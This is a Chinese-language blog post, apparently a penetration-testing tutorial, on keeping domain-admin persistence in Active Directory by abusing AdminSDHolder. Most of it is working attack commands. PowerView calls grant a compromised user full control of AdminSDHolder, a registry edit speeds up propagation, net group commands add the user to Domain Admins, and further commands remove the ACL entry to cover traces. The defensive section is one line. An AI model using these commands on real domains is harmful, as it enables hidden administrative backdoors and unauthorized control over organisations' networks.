利用AdminSDHolder进行权限维持

秒速五厘米 2022-12-30 01:26 139阅读 0赞

### 文章目录 ###

*  前言
 *  利用思路
 *  防御方法
 *  参考文章

# 前言 #

AdminSDHolder可以理解成是域内很多个组的集合体，如果一个用户能完全控制AdminSDHolder，那么它就能同时控制域内的许多组，AdminSDHolder内部的组如下：

> 1.  Administrators
> 2.  Domain Admins
> 3.  Account Operators
> 4.  Backup Operators
> 5.  Domain Controllers
> 6.  Enterprise Admins
> 7.  Print Operators
> 8.  Replicator
> 9.  Read-only Domain Controllers
> 10. Schema Admins
> 11. Server Operators

# 利用思路 #

假设有这么一种情况，我们先获得了域内zhangsan用户的权限，然后得到了域控的权限，现在需要对域控的权限进行权限维持。

`首先导入powerview`[下载地址][Link 1]

1.在域控上执行如下命令，使得zhangsan可以对AdminSDHolder完全控制。

Add-DomainObjectAcl -TargetIdentity AdminSDHolder -PrincipalIdentity zhangsan -Rights All

2.验证配置结果

Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-3763276348-88739081-2848684050-1110"} | select objectdn,ActiveDirectoryRights |sort -Unique

match后面的sid为zhangsan的sid，倘若结果如下图，则zhangsan已经对adminsdholder有了完全控制权限。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]  
也可以通过图形户页面来验证，在域控上运行窗口中输入adsiedit.msc:  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]

Get-DomainObjectAcl -SamAccountName "Domain Admins" -ResolveGUIDs | select SecurityIdentifier,ActiveDirectoryRights

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]

3.由于配置完成后90分钟才能更新设置，我们可以通过更改注册表的方式设置成60秒后触发，实战中建议不要改：

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 1 /f

4.登陆到zhangsan的账户上利用后门

> 登陆到zhangsan的账户上后，可以直接将zhangsan加入到管理员组

net groups "domain admins" /domain
    net groups "domain admins" zhangsan /add /domain
    net groups "domain admins" /domain

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

5.将触发时间恢复到120

reg add hklm\SYSTEM\CurrentControlSet\Services\NTDS\Parameters /v AdminSDProtectFrequency /t REG_DWORD /d 120 /f

6.将zhangsan 对于adminsdholder的权限取消：

Remove-DomainObjectAcl -TargetSearchBase "LDAP://CN=AdminSDHolder,CN=System,DC=test,DC=com" -PrincipalIdentity zhangsan -Rights All -Verbose

7.验证删除结果  
若无回显，则权限去除成功。

Get-DomainObjectAcl adminsdholder | ?{$_.SecurityIdentifier -match "S-1-5-21-37632763
    48-88739081-2848684050-1110"} | select objectdn,ActiveDirectoryRights |sort -Unique

# 防御方法 #

1.实时监控adminsdholder的权限更改情况。

# 参考文章 #

[域渗透——AdminSDHolder][AdminSDHolder]

[Link 1]: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221120/50159d72ae9843199e08c55baaf9cc39.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221120/ab4632be59ac457bad20609b90951bf5.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221120/236c82f6da3042a8abefbd9c2336d492.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221120/17bee772d85948cb921d510a7f442eed.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221120/c9885763bda24f6dbc207f98b66bc4b9.png
[AdminSDHolder]: https://3gstudent.github.io/3gstudent.github.io/%E5%9F%9F%E6%B8%97%E9%80%8F-AdminSDHolder/